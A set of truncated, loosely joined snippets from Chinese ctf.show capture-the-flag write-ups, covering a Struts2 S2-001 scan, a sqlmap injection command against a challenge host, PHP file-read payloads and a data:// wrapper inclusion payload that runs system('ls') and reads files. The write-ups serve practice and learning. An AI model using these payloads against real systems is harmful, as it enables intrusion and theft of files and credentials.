1.web279 发现是s2-001,应该是strus2框架漏洞 使用python通杀脚本struscan 可能需要安装lxml库 python -m pip install lxml -i https://pypi.tuna.tsinghua.edu.cn/simple python Struts2Scan.py -u"http://9ace4a67-37bf-44b7-ba40-e616bdb7a562.challenge.ctf.show/S2-001/login.action"-n S2-001 ...
读取WEB-INF/classes/com/ctfshow/servlet/GetFlag.class,因为是class文件字符有点乱,发现fl3g web300-文件读取 和上题一样 找到的flag叫f1bg 补充:以上题目中缺少三个struts2漏洞 因为是第一次了解关于Java漏洞,所以只是简单的做了漏洞复现而没有具体分析,Java开发知识还是欠缺,很多内容之前都没接触过,加油,继续...
web171 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id'].&quo
$ sqlmap -u "http://c4548dab-7ead-4a80-a384-31f72836e279.challenge.ctf.show:8080/api/index.php" --method=put --data="id=1" --headers="Content-Type: text/plain" --cookie="PHPSESSID=rj2j2j2ool1bbkj2sps4u1m0ml; ctfshow=cbbfc316f35593f84f3ae1c60b64df16" --referer=ctf.show -...
1.web59 payload: 最后三个payload读取的内容显示在了网站源代码中 c=show_source("flag.php"); c=highlight_file("flag.php"); c=var_dump(file("flag.ph
web1 题目 代码很安全,没有漏洞。 ctf.show萌新计划web1 <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) ...
ctfshow_吃鸡杯__web_两题 传入file,检查file后缀是不是php,是就包含 用data伪协议 file=data:text/plain,<?=system(%27ls%27);?>.php 发现system()被禁用 glob看下文件 file=data:text/plain,<?php print_r(glob('/*'));?>.php file=data:text/plain,<?php print_r(file('/secret'));?>....